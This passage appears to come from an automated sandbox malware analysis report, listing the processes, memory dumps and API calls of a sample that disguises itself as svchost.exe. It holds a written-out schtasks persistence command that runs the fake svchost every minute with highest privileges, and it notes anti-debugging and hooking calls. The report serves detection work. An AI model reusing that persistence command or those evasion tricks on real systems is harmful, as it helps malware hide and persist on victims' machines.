                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:14:11:51
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                                                                  Imagebase:0x7ff6fcf00000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:14:11:51
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:22
                                                                  Start time:14:11:52
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Imagebase:0x3a0000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:14:12:01
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Imagebase:0x390000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: H
                                                                    • API String ID: 0-2852464175
                                                                    • Opcode ID: 0cd1a8d9f20a846ffcdbc3325244570115770bf60af928a2450248e64a8b56f4
                                                                    • Instruction ID: fbc3c0aedaae9737f50f3df3a51f0730221c21ac4bd18cfa028ea9ae1ec383c1
                                                                    • Opcode Fuzzy Hash: 0cd1a8d9f20a846ffcdbc3325244570115770bf60af928a2450248e64a8b56f4
                                                                    • Instruction Fuzzy Hash: A631566288E3C25FC3036B749C664E57FB09E57220B4E40DBD8C5CB5A3D61C6A9AC762
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 859c075f45b55f402148a25dcf26303a86a1aec6a76639d86d62767069116843
                                                                    • Instruction ID: e1a946fbbb23744d4adea16b3a34cf8b85acb213fdee46a9ae7a949feeeca763
                                                                    • Opcode Fuzzy Hash: 859c075f45b55f402148a25dcf26303a86a1aec6a76639d86d62767069116843
                                                                    • Instruction Fuzzy Hash: E631E531B0CA8C4FD785EB6C88596BCBBE1FF5A215B4801BBD40DC32A3DE24A845C751
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: adefd78d1d0fcc0c421da7bea7029cd6e5ff8def9a3f915fe6eb6fe3861f5f2a
                                                                    • Instruction ID: b39c46e10a6f003774434504c421338903153d6a56c9d204d5965f41f4f3a3e6
                                                                    • Opcode Fuzzy Hash: adefd78d1d0fcc0c421da7bea7029cd6e5ff8def9a3f915fe6eb6fe3861f5f2a
                                                                    • Instruction Fuzzy Hash: 44713170A189098FDB99EF28C458BADB7E2FF54325F644268E01AD32D5CF38AC41CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 847ba16284147bb30c8679f0fe8c221dd12f433c8a5f492a87646a3d629bdeb5
                                                                    • Instruction ID: 660ac321214e9c2022435d8324ad8acb406a20f92a77ccec7a802822f506da18
                                                                    • Opcode Fuzzy Hash: 847ba16284147bb30c8679f0fe8c221dd12f433c8a5f492a87646a3d629bdeb5
                                                                    • Instruction Fuzzy Hash: 97219030B14D4D8FDB94FB6C88996BDB3E2FF98355B44017AE40EC32A2DE64A8418750
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0184f4bcb4068439a9ff437e1f8016535e8e4c908e5cd8942d905d34bf3193d5
                                                                    • Instruction ID: 720e2e85804b28e17ad063b1767c8c0050357ed425da53eed5fbbc60967bd313
                                                                    • Opcode Fuzzy Hash: 0184f4bcb4068439a9ff437e1f8016535e8e4c908e5cd8942d905d34bf3193d5
                                                                    • Instruction Fuzzy Hash: D711CE71C04A488FEB44EFA8C4493EEBBF0EF58324F50416AD404E3382DB78A9468B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8eb760818832e1b5c36f01d6f0de4603618c3a9d847c95cb7ae885bcdbda4be9
                                                                    • Instruction ID: 0b608216bce05482c8fb6697329ea7b6486d369cb17435bad74ad7cfc9d03003
                                                                    • Opcode Fuzzy Hash: 8eb760818832e1b5c36f01d6f0de4603618c3a9d847c95cb7ae885bcdbda4be9
                                                                    • Instruction Fuzzy Hash: A9014930A1DA494FC365FB2CD8516A973D1EF89320F5006BAD549C3382EA2CB84287C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c4702920fd6670da4af8f575ea36be13084f813a3e439a6734bf31557cfeae2
                                                                    • Instruction ID: caf63d74f2d55f4253d329785645a2d5ec0fa41805317367bed30ce33dbabc99
                                                                    • Opcode Fuzzy Hash: 0c4702920fd6670da4af8f575ea36be13084f813a3e439a6734bf31557cfeae2
                                                                    • Instruction Fuzzy Hash: 7AF08130618D194BD764FA2CD4556A9B3D1EF88324BA00579D54EC3381DE28B84247C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 82eee831777e28f4580a7c65714eb7d510bc1c8ad7896352cd9548ae47bff765
                                                                    • Instruction ID: 07080d91c6acb6a94958200856ffdfd5d2fa0c7cec9468cfe25e7769be00b4c2
                                                                    • Opcode Fuzzy Hash: 82eee831777e28f4580a7c65714eb7d510bc1c8ad7896352cd9548ae47bff765
                                                                    • Instruction Fuzzy Hash: 93F0C830A1DD5A4BD764FA3CD8416B9B3D5EF88364B600A79D54EC3382DE2CB84147C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b24ca124b1083a418f45a3b8bb55cca60c07e55bc3bd5c88cd0c45cf43f264b6
                                                                    • Instruction ID: 101a87747f173bdaf264f42b745eb0865e1926710bfcc7d58640c503de9805e5
                                                                    • Opcode Fuzzy Hash: b24ca124b1083a418f45a3b8bb55cca60c07e55bc3bd5c88cd0c45cf43f264b6
                                                                    • Instruction Fuzzy Hash: 85E08611F18D0A4BE7A876AC68652F8A3C2DF88260F905179E10DC27C3DD19AC824251
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: H
                                                                    • API String ID: 0-2852464175
                                                                    • Opcode ID: 9e8cc8fe7e25b2f6f6d322561949550146954083a1db67d7208af0d0a4b6ea06
                                                                    • Instruction ID: dfbaddf3c089fe58b5642e06e48c4b430a64930638fb8b07416f80b29e8025d6
                                                                    • Opcode Fuzzy Hash: 9e8cc8fe7e25b2f6f6d322561949550146954083a1db67d7208af0d0a4b6ea06
                                                                    • Instruction Fuzzy Hash: 1631566288E3C25FC7036B709C664E57FB09E47220B4E40DBD8C5CB5A3D61C6A9AC762
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c11fce28c6eee5403bab39e18fbcd39df737d0fa411ede4fe19bd4721e40f02a
                                                                    • Instruction ID: b3f2e4e31c4f7c511183f6771731fb413a571614f670652fe0f48f7a9d46bedc
                                                                    • Opcode Fuzzy Hash: c11fce28c6eee5403bab39e18fbcd39df737d0fa411ede4fe19bd4721e40f02a
                                                                    • Instruction Fuzzy Hash: 87713270A189098FDB98EF28C458BADB7E2FF54325F644268D01AD32D5CF38AC41CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff504e1c915f31e59188e27f42d0d11187117cdb4482daa5b93bf3e8397ae95a
                                                                    • Instruction ID: aee214e5a8c6c686a13a3fe70a1583f02b26b1312db9b04fa80497308bd38559
                                                                    • Opcode Fuzzy Hash: ff504e1c915f31e59188e27f42d0d11187117cdb4482daa5b93bf3e8397ae95a
                                                                    • Instruction Fuzzy Hash: 03219030B14D4D8FDB94FB6D88996BDB3E2FF98355B44017AE40EC32A2DE64A8418750
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b3b5709384bf0daa152494fdf621cfe1dd9f1581747fd1074917f5cd655dc4a0
                                                                    • Instruction ID: aa3c748f4cd2142a5faa15838b951c9ebb769967a6ad32dcd2dc2850b8b08ac8
                                                                    • Opcode Fuzzy Hash: b3b5709384bf0daa152494fdf621cfe1dd9f1581747fd1074917f5cd655dc4a0
                                                                    • Instruction Fuzzy Hash: EA11CE71C04A488FEB44EFA8C4493EEBBF0EF58324F50416AD404E3382DF78A9468B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 72f35ffd396e52354c5b326f4cdb16e2799717d43f8e8a0ea141f4b2f498a90b
                                                                    • Instruction ID: 45e46b18ac03159e859ba14052dc334b576c06367762f1dc4fd6a7f0deafec96
                                                                    • Opcode Fuzzy Hash: 72f35ffd396e52354c5b326f4cdb16e2799717d43f8e8a0ea141f4b2f498a90b
                                                                    • Instruction Fuzzy Hash: 7A01F930A1DA594FD764FB28D855AA973D1EF89324F50067AD549C3382EA2CB84297C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ecaaebf632ec8060ffaea899d60a785e8bfb7441bf9e4ba8cbe6ab6b4a54263f
                                                                    • Instruction ID: 011cb82b41d14e4454faa1df7b3851f1637c81085df35cc725cd2529ea262800
                                                                    • Opcode Fuzzy Hash: ecaaebf632ec8060ffaea899d60a785e8bfb7441bf9e4ba8cbe6ab6b4a54263f
                                                                    • Instruction Fuzzy Hash: DCF0A430718D194BD764FB2894556BDB3D1EF88324BA00539D54EC3381DF2CB84247C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8e63ce30479f781c914f26fc7ab67797f3e394af0950acc57d58113ae40c859d
                                                                    • Instruction ID: 248c1d526a3ea120755c5fa951f75788470c3759d6c29dc6aa70a31a5b3f103c
                                                                    • Opcode Fuzzy Hash: 8e63ce30479f781c914f26fc7ab67797f3e394af0950acc57d58113ae40c859d
                                                                    • Instruction Fuzzy Hash: C5F0A430A1DD5A4BD764BA2898416F9B3D5EF88364B600A39D54EC3382DE2CB84247C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b24ca124b1083a418f45a3b8bb55cca60c07e55bc3bd5c88cd0c45cf43f264b6
                                                                    • Instruction ID: 101a87747f173bdaf264f42b745eb0865e1926710bfcc7d58640c503de9805e5
                                                                    • Opcode Fuzzy Hash: b24ca124b1083a418f45a3b8bb55cca60c07e55bc3bd5c88cd0c45cf43f264b6
                                                                    • Instruction Fuzzy Hash: 85E08611F18D0A4BE7A876AC68652F8A3C2DF88260F905179E10DC27C3DD19AC824251

                                                                    Execution Graph

                                                                    Execution Coverage: 26.2%
                                                                    Dynamic/Decrypted Code Coverage: 100%
                                                                    Signature Coverage: 33.3%
                                                                    Total number of Nodes: 9
                                                                    Total number of Limit Nodes: 0

                                                                    Control-flow Graph
                                                                    • Rendered graph of basic blocks (executed / not executed) and edges for the function starting at 7ff7c0cce5b9-7ff7c0cce5f3; exit block 7ff7c0ccf2fb-7ff7c0ccf309.
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 4bc06908303691444f194ea3405cfe3f6ef28d5f03b956578d2eacfacaab4c5c
                                                                    • Instruction ID: 16941716885358a359be0ff8da83dfe4e2d23c9618885619a423a98dc5ae9ce6
                                                                    • Opcode Fuzzy Hash: 4bc06908303691444f194ea3405cfe3f6ef28d5f03b956578d2eacfacaab4c5c
                                                                    • Instruction Fuzzy Hash: 93825520A1C91A4BEB64FB68C4556B9B3D2EF99360FA45578D10EC73C3DE28F8428791

                                                                    Control-flow Graph
                                                                    • Rendered graph of basic blocks (executed / not executed) and edges for the function starting at 7ff7c0cc1290-7ff7c0cc170b; exit block 7ff7c0cc1f66-7ff7c0cc1f7e.
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CAO_^
                                                                    • API String ID: 0-3111533842
                                                                    • Opcode ID: 9c8e2a73369b6c4afd1f7aa17c2031eba0c6030ce07e10ca65eb06fe9e35604d
                                                                    • Instruction ID: 028d426fc554f182fca6bae1325905d889a38a2c486c2342cee8acd84d2abed2
                                                                    • Opcode Fuzzy Hash: 9c8e2a73369b6c4afd1f7aa17c2031eba0c6030ce07e10ca65eb06fe9e35604d
                                                                    • Instruction Fuzzy Hash: 90327170B28A594BE798FB2CC4657B9B7D2FF98750F944579E40EC3392CE28B8418781

                                                                    Control-flow Graph
                                                                    • Rendered graph of basic blocks (executed / not executed) and edges for the function starting at 7ff7c0cc1719-7ff7c0cc1750; exit block 7ff7c0cc1f66-7ff7c0cc1f7e.
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CAO_^
                                                                    • API String ID: 0-3111533842
                                                                    • Opcode ID: cb07c410053d39a9e47b346ed7f261968e126bc846fa6602f06672fe7046b38c
                                                                    • Instruction ID: 2f911dd600b015382d0b123cbd04c30dd09acfdb29841c3424b6e99d03fd7f8f
                                                                    • Opcode Fuzzy Hash: cb07c410053d39a9e47b346ed7f261968e126bc846fa6602f06672fe7046b38c
                                                                    • Instruction Fuzzy Hash: 5E228271B18A494FE798FB28C4657B9B7D2FF89760F940579E40EC3392CE28B8418781

                                                                    Control-flow Graph
                                                                    • Block 7ff7c0cc7a81-7ff7c0cc7b3d calls CheckRemoteDebuggerPresent and branches to 7ff7c0cc7b3f or 7ff7c0cc7b45-7ff7c0cc7b88; block 7ff7c0cc7b3f falls through to 7ff7c0cc7b45-7ff7c0cc7b88.
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CheckDebuggerPresentRemote
                                                                    • String ID:
                                                                    • API String ID: 3662101638-0
                                                                    • Opcode ID: b369ecb014a6fa52425c99dfc2f1a70f0b8a2e613c609c3011ed6d4a3b96ac97
                                                                    • Instruction ID: 0da37f1fef343b58e045278cf5b5f6d96dfaac6b627b7846f5ea7be588b2d08c
                                                                    • Opcode Fuzzy Hash: b369ecb014a6fa52425c99dfc2f1a70f0b8a2e613c609c3011ed6d4a3b96ac97
                                                                    • Instruction Fuzzy Hash: D431037190875C8FCB58DF58C88A7E9BBE0FF65311F05426BD489D7252CB34A846CB91

                                                                    Control-flow Graph
                                                                    • Rendered graph of basic blocks (executed / not executed) and edges for the function starting at 7ff7c0cc60c6-7ff7c0cc60d3; exit block 7ff7c0cc656f-7ff7c0cc6583.
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6b983dd788394912464f8d5bc5db2d2d9e51d7084fe027f741d9422060d52b4f
                                                                    • Instruction ID: b66e3cc219fd6e9afd59a4ad74797659e2d152d8f798aac12488d80da8bc38c5
                                                                    • Opcode Fuzzy Hash: 6b983dd788394912464f8d5bc5db2d2d9e51d7084fe027f741d9422060d52b4f
                                                                    • Instruction Fuzzy Hash: F4F1A530908A8E8FEBA8EF28C8557E977D1FF54310F44426EE84DC7396DB74A9458B81

                                                                    Control-flow Graph
                                                                    • Rendered graph of basic blocks (executed / not executed) and edges for the function starting at 7ff7c0cc6e72-7ff7c0cc6e7f; exit block 7ff7c0cc72eb-7ff7c0cc72ff.
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:

                                                                    Control-flow Graph (function calling SetWindowsHookExW; rendered graph not reproduced)
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0

                                                                    Control-flow Graph (function calling RtlSetProcessIsCritical; rendered graph not reproduced)
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalProcess
                                                                    • String ID:
                                                                    • API String ID: 2695349919-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2781157811.00007FF6BA531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BA530000, based on PE: true
                                                                    • Associated: 00000004.00000002.2781123767.00007FF6BA530000.00000002.00000001.01000000.00000008.sdmp
                                                                    • Associated: 00000004.00000002.2781522963.00007FF6BA65A000.00000004.00000001.01000000.00000008.sdmp
                                                                    • Associated: 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp
                                                                    • Associated: 00000004.00000002.2781836898.00007FF6BA6AD000.00000004.00000001.01000000.00000008.sdmp
                                                                    • Associated: 00000004.00000002.2781899482.00007FF6BA6AE000.00000008.00000001.01000000.00000008.sdmp
                                                                    • Associated: 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp
                                                                    • Associated: 00000004.00000002.2782686013.00007FF6BB313000.00000004.00000001.01000000.00000008.sdmp
                                                                    • Associated: 00000004.00000002.2782746031.00007FF6BB316000.00000002.00000001.01000000.00000008.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff6ba530000_ALL slumzick.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 2933794660-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 9L_^
                                                                    • API String ID: 0-1679237627
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4L_^
                                                                    • API String ID: 0-2524838182
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
